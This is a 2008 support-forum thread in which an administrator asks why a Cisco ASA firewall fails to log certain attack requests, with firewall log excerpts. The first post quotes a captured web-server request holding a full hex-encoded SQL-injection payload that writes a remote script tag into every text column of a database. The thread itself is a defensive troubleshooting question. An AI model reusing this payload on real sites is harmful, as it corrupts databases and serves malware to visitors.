ASA not logging certian requests?

Unanswered Question
Jul 23rd, 2008
User Badges:

I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)


On my web-server I see an attack:

B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;[email protected]%20CHAR(4000);[email protected]=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)


The only thing I see in the ASA log's is:

Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01



Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.

  • 1
  • 2
  • 3
  • 4
  • 5
Overall Rating: 0 (0 ratings)
Loading.
w-schultz Tue, 07/29/2008 - 06:20
User Badges:

Thank you for the response.


I am well aware of the logging types, the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URI, just not this specific attack.


My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.


I was getting many of these requests and see them on all of my webservers but not one shows up in my syslog while all the other 304001 do show up.

Actions

This Discussion